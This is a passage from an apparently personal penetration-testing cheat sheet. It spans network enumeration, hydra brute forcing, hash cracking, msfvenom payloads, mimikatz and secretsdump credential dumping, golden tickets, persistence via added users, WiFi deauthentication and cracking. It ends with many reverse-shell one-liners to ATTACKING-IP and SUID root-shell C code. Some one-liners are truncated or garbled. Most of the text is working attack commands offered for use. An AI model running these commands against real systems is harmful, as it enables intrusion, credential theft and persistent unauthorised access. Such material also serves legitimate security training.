smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse $IP 623 | ``` 624 | 625 | smb4k on Kali, useful Linux GUI for browsing SMB shares 626 | 627 | ```bash 628 | apt-get install smb4k -y 629 | ``` 630 | 631 | - on Windows: 632 | - Download All Files From A Directory Recursively 633 | 634 | ```bash 635 | smbclient '\\server\share' -N -c 'prompt OFF;recurse ON;cd 'path\to\directory\';lcd '~/path/to/download/to/';mget *' 636 | ``` 637 | 638 | ```bash 639 | net use \\TARGET\IPC$ "" /u:"" #Manual Null session testing 640 | ``` 641 | 642 | ## **SNMP Enumeration (161):** 643 | 644 | - Fix SNMP output values so they are human readable: 645 | 646 | ```bash 647 | apt-get install snmp-mibs-downloader download-mibs 648 | echo "" > /etc/snmp/snmp.conf 649 | ``` 650 | 651 | ```bash 652 | snmpwalk -c public -v1 192.168.1.X 1| 653 | grep hrSWRunName|cut -d* * -f 654 | ``` 655 | 656 | ```bash 657 | snmpcheck -t 192.168.1.X -c public 658 | ``` 659 | 660 | ```bash 661 | onesixtyone -c names -i hosts 662 | ``` 663 | 664 | ```bash 665 | nmap -sT -p 161 192.168.X.X -oG snmp_results.txt 666 | nmap -n -vv -sV -sU -Pn -p 161,162 –script=snmp-processes,snmp-netstat IP 667 | ``` 668 | 669 | ```bash 670 | snmpenum -t 192.168.1.X 671 | ``` 672 | 673 | ```bash 674 | onesixtyone -c names -i hosts 675 | ``` 676 | 677 | ```bash 678 | #metasploit 679 | auxiliary/scanner/snmp/snmp_enum 680 | auxiliary/scanner/snmp/snmp_enum_hp_laserjet 681 | auxiliary/scanner/snmp/snmp_enumshares 682 | auxiliary/scanner/snmp/snmp_enumusers 683 | auxiliary/scanner/snmp/snmp_login 684 | ``` 685 | 686 | ## **Oracle (1521):** 687 
| 688 | ```bash 689 | tnscmd10g version -h INSERTIPADDRESS 690 | ``` 691 | 692 | ```bash 693 | tnscmd10g status -h INSERTIPADDRESS 694 | ``` 695 | 696 | ## LDAP (389) 697 | 698 | [JXplorer - an open source LDAP browser](http://jxplorer.org/) 699 | 700 | ## MSSQL (1433) 701 | 702 | ```bash 703 | nmap -n -v -sV -Pn -p 1433 –script ms-sql-brute –script-args userdb=users.txt,passdb=passwords.txt IP 704 | nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password IP 705 | ``` 706 | 707 | [Hunting for MSSQL | Offensive Security](https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/) 708 | 709 | ## **Mysql Enumeration (3306):** 710 | 711 | ```bash 712 | nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 713 | 714 | mysql –h IP -u root -p 715 | show databases; 716 | show tables; 717 | use tablename; 718 | describe table; 719 | select table1, table2 from tablename; 720 | ``` 721 | 722 | ## Active Directory 723 | 724 | ```bash 725 | # current domain info 726 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() 727 | 728 | # domain trusts 729 | ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() 730 | 731 | # current forest info 732 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() 733 | 734 | # get forest trust relationships 735 | ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships() 736 | 737 | # get DCs of a domain 738 | nltest /dclist:offense.local 739 | net group "domain controllers" /domain 740 | 741 | # get DC for currently authenticated session 742 | nltest /dsgetdc:offense.local 743 | 744 | # get domain trusts from cmd shell 745 | nltest /domain_trusts 
746 | 747 | # get user info 748 | nltest /user:"spotless" 749 | 750 | # get DC for currently authenticated session 751 | set l 752 | 753 | # get domain name and DC the user authenticated to 754 | klist 755 | 756 | # get all logon sessions. Includes NTLM authenticated sessions 757 | klist sessions 758 | 759 | # kerberos tickets for the session 760 | klist 761 | 762 | # cached krbtgt 763 | klist tgt 764 | 765 | # whoami on older Windows systems 766 | set u 767 | 768 | # find DFS shares with ADModule 769 | Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name 770 | 771 | # find DFS shares with ADSI 772 | $s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name} 773 | 774 | # check if spooler service is running on a host 775 | powershell ls "\\dc01\pipe\spoolss" 776 | ``` 777 | 778 | ## MSSQL 779 | 780 | Try using "Browse for More" via MS SQL Server Management Studio 781 | 782 | Enumeration / Discovery: 783 | 784 | Nmap: 785 | 786 | ```bash 787 | nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 788 | ``` 789 | 790 | Metasploit: 791 | 792 | ```bash 793 | msf > use auxiliary/scanner/mssql/mssql_ping 794 | ``` 795 | 796 | ### Bruteforce MSSQL Login 797 | 798 | ```bash 799 | msf > use auxiliary/admin/mssql/mssql_enum 800 | ``` 801 | 802 | ### Metasploit MSSQL Shell 803 | 804 | ```bash 805 | msf > use exploit/windows/mssql/mssql_payload 806 | msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp 807 | ``` 808 | 809 | # Gaining Access 810 | 811 | - hydra: bruteforce tool 812 | 813 | ```bash 814 | hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.0.0.101 -t 4 -v -f 815 | #-l is the user we want to attack, -P password file list, -t threads, -v verbose 816 | #it's better to intercept the login page with burp, check to see the correct username&password syntax and copy the exact failed message 817 | -#f 
exit when a login/pass pair is found 818 | hydra -l hasamba -P ~/Desktop/test_passwords.txt 10.0.0.210 -s 8085 http-post-form "/login/:username=^USER^&password=^PASS^:F=Authentication failed" -VVV -t 6 - 819 | hydra OPT #will show us optional modules for http and such 820 | hydra -U MODULE_NAME #will show module examples 821 | 822 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V #Hydra FTP brute force 823 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V #Hydra POP3 brute force 824 | hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V #Hydra SMTP brute force 825 | 826 | hydra -l username -P password-list http-post-form ":POST_REQUEST_FOR_LOGIN:FAILED_RESPONSE_IDENTIFIER" 827 | ``` 828 | 829 | - metasploit - can also bruteforce 830 | 831 | ```bash 832 | use auxialary/scanner/ssh/ssh_login 833 | options 834 | set username root 835 | set pass_file /usr/share... 836 | set rhosts 837 | set threads 10 838 | set verbose true 839 | run 840 | ``` 841 | 842 | - unshadow (kali) - combines the passwd and shadow files, inserting the password hashes into the passwd entries, so the resulting file can be fed to hashcat to attempt cracking the passwords.
843 | 844 | ```bash 845 | unshadow PASSSWD_FILE SHADOW_FILE 846 | ``` 847 | 848 | - [hashcat](https://www.notion.so/Hashcat-b885f8ac8c0f450986d62c0d29f44cb9) - crack passwords hashes ([Cheat Sheet](https://s3.us-west-2.amazonaws.com/secure.notion-static.com/a44ab748-a9a9-437e-a4a1-2fa1cc6c03a8/HashcatCheatSheet.v2018.1b.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAT73L2G45O3KS52Y5%2F20201122%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20201122T190235Z&X-Amz-Expires=86400&X-Amz-Signature=03753b73d70b97901e6a764011ae5ffdbffc2d9dcbd00673f79b64097b1299d9&X-Amz-SignedHeaders=host&response-content-disposition=filename%20%3D%22HashcatCheatSheet.v2018.1b.pdf%22)) 849 | 850 | ```bash 851 | hashcat -m "OSCODE" unshadow.txt passwordFile.txt 852 | #from here: https://github.com/frizb/Hashcat-Cheatsheet 853 | hashcat --force -m300 --status -w3 -o found.txt --remove --potfile-disable -r rules\OneRuleToRuleThemAll.rule hash.txt rockyou.txt 854 | ``` 855 | 856 | - hash-identifier 857 | 858 | ```bash 859 | hash-identifier [hash] 860 | ``` 861 | 862 | - [name-that-hash](https://github.com/HashPals/Name-That-Hash) - better hash analyzer 863 | 864 | ```jsx 865 | 866 | ``` 867 | 868 | - cewl - create wordlist from a website 869 | 870 | ```bash 871 | cewl -v --with-numbers -e --email_file cewl_email.wordlist -w cewl.wordlist http://sneakycorp.htbme 872 | 873 | #my favorite rule to add: 874 | john --wordlist=wordlist.txt --rules=jumbo --stdout > wordlist-modified.txt 875 | 876 | hashcat --force cewl.wordlist -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words 877 | 878 | https://github.com/praetorian-inc/Hob0Rules 879 | ###hob064 This ruleset contains 64 of the most frequent password patterns 880 | hashcat -a 0 -m 1000 wordlists/rockyou.txt -r hob064.rule -o cracked.txt 881 | 882 | ###d3adhob0 This ruleset is much more extensive and utilizes many common password structure ideas 883 | hashcat -a 0 -m 1000 wordlists/english.txt -r d3adhob0.rule -o cracked.txt 884 | 
885 | #adding John rules 886 | john --wordlist=wordlist.txt --rules --stdout > wordlist-modified.txt 887 | john --wordlist=wordlist.txt --rules=best64 --stdout > wordlist-modified.txt 888 | ``` 889 | 890 | - john the ripper - password cracker ([cheat sheet](https://drive.google.com/viewerng/viewer?url=https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf)) ([Jumbo community version](https://github.com/openwall/john)) 891 | 892 | ```bash 893 | john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt 894 | #after john has finished, show the cracked results 895 | john hashes.txt --show 896 | 897 | john 127.0.0.1.pwdump --wordlist=dictionary.txt --rules=Jumbo #with jumbo rules from https://github.com/openwall/john 898 | ``` 899 | 900 | [CyberChef](https://gchq.github.io/CyberChef/) 901 | 902 | [CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.](https://crackstation.net/) 903 | 904 | [Hash Analyzer](https://www.tunnelsup.com/hash-analyzer/) 905 | 906 | [Cipher Identifier (online tool) | Boxentriq](https://www.boxentriq.com/code-breaking/cipher-identifier) 907 | 908 | - msfvenom (kali) - payload generator 909 | 910 | ```bash 911 | msfvenom -p windows/meterpreter/reverse_tcp LHOSTS=10.10.10.14 LPORT=4444 -f aspx > ex.aspx 912 | 913 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 914 | ``` 915 | 916 | - [responder (impacket)](https://www.notion.so/responder-imapcket-b7bdbbb91ce74e98834dd88ec1715528) - MITM - listens in the background and waits for failed name-resolution requests 917 | 918 | ```bash 919 | responder -I eth0 -rdwv #Run Responder.py for the length of the engagement while you're working on other attack vectors.
920 | ``` 921 | 922 | # Post Exploitation 923 | 924 | ## Useful commands to run locally on a Linux system to quickly analyze it and possibly help escalate privileges 925 | 926 | - whoami - shows the user we are logged in as 927 | - history - shows the command history; it often reveals passwords or other sensitive data from commands the user ran 928 | - sudo -l - shows which programs we can run via sudo; check each of them against [GTFOBins](https://gtfobins.github.io/) 929 | - if we get `(ALL, !root) /bin/bash`, we can exploit with [this](https://www.exploit-db.com/exploits/47502) 930 | - uname -a - shows the kernel/Linux version so we can search for a matching privilege-escalation exploit 931 | - export - lists environment variables 932 | - processes 933 | 934 | ```bash 935 | ps -ef 936 | ps auxf 937 | ps auxfww 938 | ``` 939 | 940 | - find in files 941 | 942 | ```bash 943 | find . -name "*.java" -type f -exec fgrep -iHn "textToFind" {} \; 944 | find . -regex ".*\.\(c\|java\)" -type f -exec fgrep -iHn "textToFind" {} \; 945 | find / -maxdepth 4 -name *.conf -type f -exec grep -Hn "textToFind" {} \; 2>/dev/null 946 | # SUID files owned by root 947 | find / -uid 0 -perm -4000 -type f 2>/dev/null 948 | # SUID files owned by root and world readable 949 | find / -uid 0 -perm -u=s,o=r -type f -exec ls -la {} \; 2> /dev/null 950 | # SUID files 951 | find / -perm -4000 -type f 2>/dev/null 952 | # world writable directories 953 | find / -perm -2 -type d 2>/dev/null 954 | 955 | #find passwords in files and ignore errors and filter out the proc and other folders 956 | find . ! -path "*/proc/*" -type f -name "*" -exec fgrep -iHn password {} \; 957 | find . -type f \( -iname \*.conf -o -iname \*.cfg -o -iname \*.xml -o -iname \*.ini -o -iname \*.json -o -iname \*.sh -o -iname \*.pl -o -iname \*.py \) -exec fgrep -iHn password {} \; 2> /dev/null 958 | 959 | # find using several patterns read from file (patterns are delimited by new line) 960 | find .
-type f -exec grep -iHFf patterns.txt {} \; 961 | 962 | # find password keyword in small files 963 | find . -type f -size -512k -exec fgrep -iHn password {} \; 964 | 965 | # decompile java jar files and search for passwords in them 966 | find . -name "*.jar" -type f -exec ~/jd-cli/jd-cli -oc -l -n -st {} \; | egrep -i -e "Location:" -e "password" | uniq 967 | ``` 968 | 969 | ```bash 970 | # check open ports and services listening 971 | netstat -anp 972 | 973 | # check defined hosts 974 | cat /etc/hosts 975 | 976 | # check local IP addresses and interfaces 977 | ifconfig -a 978 | 979 | # check route 980 | route -v 981 | 982 | # check filesystem 983 | df 984 | 985 | # check sudo privileges 986 | sudo -l 987 | 988 | # check crontab 989 | crontab -l 990 | 991 | # check inittab 992 | cat /etc/inittab 993 | 994 | # try to sniff traffic 995 | tcpdump 996 | tcpdump -s0 not port 22 -w trace.pcap 997 | 998 | # check known hosts 999 | cat ~/.ssh/known_hosts 1000 | 1001 | # try to read mail 1002 | head /var/mail/root 1003 | 1004 | # list groups, users 1005 | cat /etc/group 1006 | cat /etc/passwd 1007 | # with root privileges 1008 | cat /etc/shadow 1009 | 1010 | # check shared memory 1011 | ipcs -mp 1012 | 1013 | # logout 1014 | logout 1015 | 1016 | # close script session 1017 | Ctrl + D 1018 | ``` 1019 | 1020 | ## Scripts 1021 | 1022 | - [pwncat](https://github.com/calebstewart/pwncat) - pwncat is a post-exploitation platform for Linux targets 1023 | 1024 | ```bash 1025 | cd ~/tools 1026 | source pwncat-env/bin/activate 1027 | 1028 | # Connect to a bind shell 1029 | pwncat connect://10.10.10.10:4444 1030 | pwncat 10.10.10.10:4444 1031 | pwncat 10.10.10.10 4444 1032 | # Listen for reverse shell 1033 | pwncat bind://0.0.0.0:4444 1034 | pwncat 0.0.0.0:4444 1035 | pwncat :4444 1036 | pwncat -lp 4444 1037 | # Connect via ssh 1038 | pwncat ssh://user:password@10.10.10.10 1039 | pwncat user@10.10.10.10 1040 | pwncat user:password@10.10.10.10 1041 | pwncat -i id_rsa user@10.10.10.10 1042 | #
SSH w/ non-standard port 1043 | pwncat -p 2222 user@10.10.10.10 1044 | pwncat user@10.10.10.10:2222 1045 | # Reconnect utilizing installed persistence 1046 | # If reconnection fails and no protocol is specified, 1047 | # SSH is used as a fallback. 1048 | pwncat reconnect://user@10.10.10.10 1049 | pwncat reconnect://user@c228fc49e515628a0c13bdc4759a12bf 1050 | pwncat user@10.10.10.10 1051 | pwncat c228fc49e515628a0c13bdc4759a12bf 1052 | pwncat 10.10.10.10 1053 | 1054 | ^D 1055 | run enumerate.gather 1056 | 1057 | run escalate.auto exec 1058 | 1059 | ---OLD--- 1060 | 1061 | upload/download --help 1062 | 1063 | persist --help 1064 | persist --install 1065 | perist --status 1066 | persist --clean 1067 | 1068 | tamper --help 1069 | 1070 | busybox --install 1071 | 1072 | enum --help 1073 | enum --show --type sudo 1074 | enum --report enumaration.md 1075 | 1076 | privsec --help 1077 | privsec -l 1078 | privsec --escalate 1079 | privsec -e -u sysadmin 1080 | ``` 1081 | 1082 | - [sherlock](https://github.com/rasta-mouse/Sherlock) - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. 1083 | - [windows exploit suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - This tool compares a target's patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
1084 | - metasploit migrate process and search suggester 1085 | 1086 | ```bash 1087 | ps 1088 | migrate 1788 1089 | search suggester 1090 | ``` 1091 | 1092 | - [psexec](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/psexec%20d818d32588314cb68f8ca3db57a6e1ef.md), wmiexec.py or [smbexec.py](http://smbexec.py) - privilege escalation for windows 1093 | - [powershellempire](https://github.com/PowerShellEmpire/PowerTools) - windows privilege escalation 1094 | 1095 | ```bash 1096 | powershell -ep (ExecutionPolicy) bypass 1097 | . .\PowerView.ps1 1098 | Get-NetDomain 1099 | Get-NetDomainController 1100 | Get-DomainPolicy 1101 | (Get-DomainPolicy)."system access" 1102 | Get-NetUser 1103 | Get-NetUser | select cn /samaccountname/description 1104 | Get-UserProperty -Properties pwdlastset/logoncount/badpwdcount 1105 | Get-NetComputer -FullData(extra data) | select(like grep) OperatingSystem 1106 | Get-NetGroupMember -GroupName "Domain Admins" 1107 | Invoke-ShareFinder 1108 | Get-NetGPO | select displayname, whenchanged 1109 | 1110 | ``` 1111 | 1112 | - [bloodhound](https://github.com/BloodHoundAD/BloodHound) - easily identify highly complex attack paths 1113 | - crackmapexec - can take passwords or hashes that we found and check them against all computers on a network 1114 | 1115 | ```powershell 1116 | crackmapexec 192.168.57.0/24 -u fcastle -d MARVEL.local -p Password1 1117 | #Spray the network with local login credentials then dump SAM contents 1118 | crackmapexec smb 10.0.0.1/24 -u administrator -p 'password' --local-auth --sam 1119 | #Pass the hash network-wide, local login, dump LSA contents 1120 | crackmapexec smb 10.0.0.1/24 -u administrator -H --local-auth --lsa 1121 | 1122 | ``` 1123 | 1124 | - [secretsdump.py](http://secretsdump.py) (impacket) - dumps hashes for known user/password 1125 | 1126 | ```powershell 1127 | secretsdump.py marvel/fcastle:Pssword1@192.168.4.4 1128 | ``` 1129 | 1130 | - [incognito 
(meterpeter)](https://www.notion.so/incognito-meterpeter-881379ef297d4b3f8b50745428e1e8ed) - can impersonate a user 1131 | - [GetUserSPNs.py](http://getuserspns.py) (impacket) 1132 | 1133 | ```bash 1134 | GetUserSpns.py marvel.local/fcastle:Password1 -dc-ip 192.168.57.140 -request 1135 | ``` 1136 | 1137 | - [mimikatz](https://github.com/gentilkiwi/mimikatz) - can extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets 1138 | 1139 | ```bash 1140 | mimikatz 1141 | privilege::debug` (allows us to bypass several protections) 1142 | sekurlsa::logonpasswords` shows all user logons since reboot; we can pass the hash or crack them. We can also look for `wdigest`: before Windows 8 (i.e. up to and including Windows 7) the password was stored in plain text; from Windows 8 Microsoft turned it off, we can turn it on from mimikatz and wait for a user to login 1143 | lsadump::sam` dumps the SAM 1144 | lsadump::lsa /patch` dumps Local Security Authority 1145 | lsadump::lsa /inject /name:krbtgt` 1146 | kerberos::golden /User:Administrator(doesnt matter, can be fake) /domain:marvel.local /sid:SID /krbtgt:NTLM /id:500(your RID) /ptt(pass the ticket to our next session)` 1147 | misc::command` (gives us a command prompt with full privileges) 1148 | ``` 1149 | 1150 | # Privilege Escalation ([a lot of resources](https://github.com/coreb1t/awesome-pentest-cheat-sheets#privilege-escalation)) 1151 | 1152 | [Linux privilege escalation](https://jok3rsecurity.wordpress.com/linux-privilege-escalation/) 1153 | 1154 | [Linux Privilege Escalation CheatSheet for OSCP - ByteFellow](https://www.bytefellow.com/linux-privilege-escalation-cheatsheet-for-oscp/) 1155 | 1156 | [windows privilege escalation](https://jok3rsecurity.wordpress.com/windows-privilege-escalation/) 1157 | 1158 | [Windows Privilege Escalation Cheatsheet for OSCP - ByteFellow](https://www.bytefellow.com/windows-privilege-escalation-cheatsheet-for-oscp/) 1159 |
1160 | [C0nd4/OSCP-Priv-Esc](https://github.com/C0nd4/OSCP-Priv-Esc) 1161 | 1162 | ## **Linux:** 1163 | 1164 | Find SUID binaries (executed with the file owner's privileges) 1165 | 1166 | ```bash 1167 | find / -perm -u=s -type f 2>/dev/null 1168 | ``` 1169 | 1170 | Find SGID binaries (executed with the file group's privileges) 1171 | 1172 | ```bash 1173 | find / -perm -g=s -type f 2>/dev/null 1174 | ``` 1175 | 1176 | Find sticky-bit directories 1177 | 1178 | ```bash 1179 | find / -perm -1000 -type d 2>/dev/null 1180 | ``` 1181 | 1182 | If Python is executable as root 1183 | 1184 | ```bash 1185 | python2.7 -c "import pty;pty.spawn('/bin/sh');" 1186 | ``` 1187 | 1188 | - [LinPeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux Privilege Escalation Awesome Script 1189 | 1190 | ```bash 1191 | #From github 1192 | curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh 1193 | 1194 | #Local network 1195 | sudo python -m SimpleHTTPServer 80 1196 | curl 10.10.10.10/linpeas.sh | sh 1197 | 1198 | #Without curl 1199 | sudo nc -q 5 -lvnp 80 < linpeas.sh 1200 | cat < /dev/tcp/10.10.10.10/80 | sh 1201 | 1202 | #Output to file 1203 | linpeas -a > /dev/shm/linpeas.txt 1204 | less -r /dev/shm/linpeas.txt #Read with colors 1205 | ``` 1206 | 1207 | - [LinEnum](https://github.com/rebootuser/LinEnum) 1208 | 1209 | ```bash 1210 | ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t 1211 | #-k Enter keyword 1212 | #-e Enter export location 1213 | #-t Include thorough (lengthy) tests 1214 | #-s Supply current user password to check sudo perms (INSECURE) 1215 | #-r Enter report name 1216 | #-h Displays this help text 1217 | ``` 1218 | 1219 | [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) 1220 | 1221 | [https://github.com/pentestmonkey/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) 1222 | 1223 |
## **Windows:** 1224 | 1225 | ```powershell 1226 | #after getting a low privilege shell 1227 | systeminfo 1228 | #copy the result to systeminfo.txt 1229 | python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --update 1230 | python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --systeminfo systeminfo.txt --database [DB].xls 1231 | ``` 1232 | 1233 | [https://github.com/pentestmonkey/windows-privesc-check](https://github.com/pentestmonkey/windows-privesc-check) 1234 | 1235 | 1236 | 1237 | [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) 1238 | 1239 | [https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/) 1240 | 1241 | # Maintain Access 1242 | 1243 | - metasploit 1244 | 1245 | ```bash 1246 | persistence -h 1247 | OR 1248 | exploit/windows/local/persistence 1249 | OR 1250 | net user hacker password123 /add 1251 | ``` 1252 | 1253 | # Wireless Penetration 1254 | 1255 | - airmon-ng, airodump-ng, aircrack-ng - crack wifi networks 1256 | 1257 | ```bash 1258 | iwconfig #show wireless cards, check after connecting the wireless card to the vm machine in options 1259 | airmon-ng check kill #kills processes that would interfere with monitor mode 1260 | airmon-ng start wlan0 #starts monitor mode on the card 1261 | iwconfig #confirms that we are in monitor mode 1262 | airodump-ng wlan0mon #lists available networks; PWR indicates signal strength, the smaller the value the closer the network 1263 | airodump-ng -c 6 --bssid MAC -w capture wlan0mon #will capture data from the specific MAC address of the network we want, 6 is the channel number of the network 1264 | 1265 | #we are waiting to capture the handshake; when it arrives it will be shown in the header 1266 | #we can make it faster by DEAUTH, i.e. kicking a connected client off; while it re-authenticates we capture the handshake 1267 | #in
a new terminal: 1268 | aireplay-ng -0 1 -a MAC_OF_THE_NETWORK -c MAC_OF_THE_STATION_CONNECTED wlan0mon 1269 | ls capture* 1270 | aircrack-ng -w wordlist.txt -b MAC_OF_THE_NETWORK CAPTUREFILE #could be done also with hashcat 1271 | #phone numbers are very common as a password 1272 | 1273 | ``` 1274 | 1275 | # **Shells & Reverse Shells** 1276 | 1277 | ## **SUID C Shells** 1278 | 1279 | - bin/bash: 1280 | 1281 | ``` 1282 | int main(void){ 1283 | 1284 | setresuid(0, 0, 0); 1285 | 1286 | system("/bin/bash"); 1287 | 1288 | } 1289 | ``` 1290 | 1291 | - bin/sh: 1292 | 1293 | ``` 1294 | int main(void){ 1295 | 1296 | setresuid(0, 0, 0); 1297 | 1298 | system("/bin/sh"); 1299 | 1300 | } 1301 | ``` 1302 | 1303 | ### **TTY Shell:** 1304 | 1305 | ```bash 1306 | python -c 'import pty;pty.spawn("/bin/bash")' #Python TTY Shell Trick 1307 | ``` 1308 | 1309 | ```bash 1310 | echo os.system('/bin/bash') 1311 | ``` 1312 | 1313 | ```bash 1314 | /bin/sh –i #Spawn Interactive sh shell 1315 | ``` 1316 | 1317 | ```bash 1318 | execute('/bin/sh') 1319 | ``` 1320 | 1321 | - LUA 1322 | 1323 | ```bash 1324 | !sh 1325 | ``` 1326 | 1327 | - Privilege Escalation via nmap 1328 | 1329 | ```bash 1330 | :!bash 1331 | ``` 1332 | 1333 | - Privilege escalation via vi 1334 | 1335 | ### Fully Interactive TTY 1336 | 1337 | ``` 1338 | In reverse shell 1339 | python -c 'import pty; pty.spawn("/bin/bash")' 1340 | Ctrl-Z 1341 | In Attacker console 1342 | stty -a 1343 | stty raw -echo 1344 | fg 1345 | In reverse shell 1346 | reset 1347 | export SHELL=bash 1348 | export TERM=xterm-256color 1349 | stty rows columns 1350 | ``` 1351 | 1352 | ### **Spawn Ruby Shell** 1353 | 1354 | ```bash 1355 | exec "/bin/sh" 1356 | ``` 1357 | 1358 | ```bash 1359 | ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 1360 | ``` 1361 | 1362 | ### **Netcat** 1363 | 1364 | ```bash 1365 | nc -e /bin/sh ATTACKING-IP 80 1366 | ``` 1367 | 1368 | ```bash 1369 | /bin/sh | nc ATTACKING-IP 80 1370 | ``` 
1371 | 1372 | ```bash 1373 | rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p 1374 | ``` 1375 | 1376 | ### **Telnet Reverse Shell** 1377 | 1378 | ```bash 1379 | rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p 1380 | ``` 1381 | 1382 | ```bash 1383 | telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443 1384 | ``` 1385 | 1386 | ### **PHP** 1387 | 1388 | ```bash 1389 | php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' 1390 | ``` 1391 | 1392 | - (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6) 1393 | 1394 | ### **Bash** 1395 | 1396 | ```bash 1397 | exec /bin/bash 0&0 2>&0 1398 | ``` 1399 | 1400 | ```bash 1401 | 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196 1402 | ``` 1403 | 1404 | ```bash 1405 | exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done 1406 | ``` 1407 | 1408 | ```bash 1409 | # or: while read line 0<&5; do $line 2>&5 >&5; done 1410 | ``` 1411 | 1412 | ```bash 1413 | bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 1414 | ``` 1415 | 1416 | ### **Perl** 1417 | 1418 | ```bash 1419 | exec "/bin/sh"; 1420 | ``` 1421 | 1422 | ```bash 1423 | perl —e 'exec "/bin/sh";' 1424 | ``` 1425 | 1426 | ```bash 1427 | perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1428 | ``` 1429 | 1430 | ```bash 1431 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 1432 | ``` 1433 | 1434 | - Windows 1435 | 1436 | ```bash 1437 | perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1438 | ``` 1439 | 1440 | - 1441 | 1442 | # Meterpreter (Metasploit) ([cheet 
